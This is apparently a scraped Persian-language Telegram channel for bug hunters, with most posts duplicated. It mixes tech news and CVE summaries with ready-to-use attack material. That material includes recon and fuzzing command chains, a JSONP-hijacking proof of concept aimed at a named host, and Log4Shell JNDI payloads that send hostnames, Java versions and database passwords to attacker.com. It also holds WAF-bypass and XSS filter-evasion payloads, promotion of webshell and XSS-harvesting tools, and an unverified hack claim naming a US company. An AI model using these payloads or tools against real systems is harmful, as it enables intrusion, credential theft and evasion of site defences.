🔍 نکات Bounty Bug: خزیدن پارامترها با Katana برای بردهای سریع XSS/SQLI!
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent
🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش میدهد و تشخیص آسیبپذیریها و تضمین آن بردهای سریع را آسانتر میکند.
💡موارد حذفی: استفاده از قابلیتهای کاتانا میتواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
⚡3❤2
🔴 Autorize
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Link GitHub 🐈
https://github.com/Quitten/Autorize
Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1
نیویورک تایمز از OpenAI و مایکروسافت به دلیل نقض حق چاپ شکایت کرده است
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و میگوید این شرکتها اکنون با «کپی کردن و استفاده از میلیونها مقاله» از مقالههای این نشریه برای ساخت مدلهای هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت میکنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.
طبق این شکایت، تایمز ادعا میکند که مدلهای زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت میکنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار میکند، محتوای آن را از نزدیک خلاصه میکند و سبک ارائه آن را تقلید میکند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.
🔴 ادامه خبر در لینک
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
😁1😍1
KASRAONE
(CSRF) ♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲ ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ K1 kasraone
🔴 CVE-2023-49006
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤5👍2😍1
یک شرکت فرانسوی اولین آینه هوشمند هوش مصنوعی جهان را عرضه کرد: این آینه می تواند احساسات کاربران را شناسایی کند و استرس را از بین ببرد.
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1😍1
🔴 ezXSS
Git Hub : 🐈
Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)
The following information can be collected on a vulnerable page:
The URL of the page
IP Address
Any page referer (or share referer)
LINKTOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Git Hub : 🐈
Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)
The following information can be collected on a vulnerable page:
The URL of the page
IP Address
Any page referer (or share referer)
LINKTOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍2
WebShells
Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )
Git Hub 🐈
https://github.com/sagsooz/Bypass-Webshell
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )
Git Hub 🐈
https://github.com/sagsooz/Bypass-Webshell
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - sagsooz/Webshell-bypass: A collection of advanced PHP and ASPX web shells designed to bypass security measures.
A collection of advanced PHP and ASPX web shells designed to bypass security measures. - sagsooz/Webshell-bypass
⚡2
🔴 Blind SSRF to Port Scanning through response time
LINK MEDIUM
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
LINK MEDIUM
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Medium
Blind SSRF to Port Scanning through response time
Introduction:
🔴 اطلاعات سازمان آمریکایی توست هکرها هک شد ! : American Alarm and
Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانهها و مشاغل در سراسر نیوانگلند محافظت میکنیم. شرکت ما با متخصصان متعهد کار میکند که در جوامعی که به آنها خدمت میکنند زندگی میکنند - شاید حتی در همسایگی شما.
سایت: www.americanalarm.com
نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Communications
که در سال 1971 تاسیس شد و دفتر مرکزی آن در آرلینگتون، ماساچوست، مستقر است، American Alarm and Communications
یک شرکت ادغام و نظارت بر سیستم های امنیتی 24 ساعته است. در American Alarm ما به حفاظت محلی و قابل اعتماد اعتقاد داریم. ما از سال 1971 از خانهها و مشاغل در سراسر نیوانگلند محافظت میکنیم. شرکت ما با متخصصان متعهد کار میکند که در جوامعی که به آنها خدمت میکنند زندگی میکنند - شاید حتی در همسایگی شما.
سایت: www.americanalarm.com
نشانی:
297 برادوی، آرلینگتون،
ماساچوست، 02474،
ایالات متحده
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
😱2
🔴 CISA
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.
The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
دستورالعمل اضطراری را به آژانس های فدرال در مورد سوء استفاده های Ivanti Zero-Day صادر می کند
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products.
The development arrives as the vulnerabilities – an authentication bypass (CVE-2023-46805) and a code injection bug (CVE-2024-21887) – have come under widespread exploitation by multiple threat actors. The flaws allow a malicious actor to craft malicious requests and execute arbitrary commands on the system.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤3👍1
🔴 CVE
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2023-48382
Softnext Mail SQR Expert
یک پلتفرم مدیریت ایمیل است که دارای یک آسیبپذیری Local File Inclusion (LFI) در URL مربوط به تحویل ایمیل است. یک مهاجم ازراه دور تأیید نشده میتواند از این آسیبپذیری برای اجرای فایل PHP دلخواه با پسوند فایل .asp در مسیرهای خاص سیستم، برای دسترسی و اصلاح اطلاعات جزئی سیستم سوء استفاده کند، اما در دسترس بودن سرویس تأثیری ندارد.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
⚡2
🔴 CVE
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-0728
LFI
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍2
🔴CVE
CVE-2024-22859
آسیبپذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه میدهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-22859
آسیبپذیری Cross-Site Request Forgery (CSRF) در livewire قبل از نسخه 3.0.4، به مهاجمان راه دور اجازه میدهد تا تابع getCsrfToken کد دلخواه را اجرا کنند. توجه: فروشنده با این موضوع مخالفت می کند زیرا commit 5d88731 یک مشکل قابلیت استفاده (کدهای وضعیت HTTP 419 برای فعالیت مشتری قانونی) را برطرف می کند، نه یک مشکل امنیتی.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
[GHSA-2cjh-75gp-34gc] livewire Cross-Site Request Forgery vulnerability by valorin · Pull Request #3490 · github/advisory-database
Updates
Affected products
CVSS
Severity
Comments
This does not appear to be an actual vulnerability.
The referenced commit is fixing a CSRF expiring issue, which was causing 419 errors and I cann...
Affected products
CVSS
Severity
Comments
This does not appear to be an actual vulnerability.
The referenced commit is fixing a CSRF expiring issue, which was causing 419 errors and I cann...
🔴 Log4Shell
CVE-2021-44228 Log4Shell
🔴 Apache Log4j2 <=2.14.1
Payloads
Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}
# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password
🔴WAF Bypass
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2021-44228 Log4Shell
🔴 Apache Log4j2 <=2.14.1
Payloads
Java
# Identify Java version and hostname
${jndi:ldap://${java:version}.domain/a}
${jndi:ldap://${env:JAVA_VERSION}.domain/a}
${jndi:ldap://${sys:java.version}.domain/a}
${jndi:ldap://${sys:java.vendor}.domain/a}
${jndi:ldap://${hostName}.domain/a}
${jndi:dns://${hostName}.domain}
# More enumerations keywords and variables
java:os
docker:containerId
web:rootDir
bundle:config:db.password
🔴WAF Bypass
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a}
# using lower and upper
${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc}
${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
# using env to create the letter
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
⚡2
🔴 MEDIUM
Web Application Firewall (WAF) Evasion Techniques
🔴 LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Web Application Firewall (WAF) Evasion Techniques
🔴 LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Medium
Web Application Firewall (WAF) Evasion Techniques
I can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…
❤1
بایپس باگ XSS
<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
<A
HREF="http://66.102.7.147/">XSS</A>0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"veris-->group<svg/onload=alert(/XSS/)//#"><img src=M onerror=alert('XSS');>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🔥2
Git Hub 🐈
Tools bypass
Gema
Neam :
FabricBlockedServersBypass
Link
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Tools bypass
Gema
Neam :
FabricBlockedServersBypass
Link
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - svenar-nl/FabricBlockedServersBypass: Is a server you play on blocked by Mojang? Use this fabric mod to bypass it!
Is a server you play on blocked by Mojang? Use this fabric mod to bypass it! - svenar-nl/FabricBlockedServersBypass
❤1
🔴 XSS
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,topk%2B%27lert%27>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤2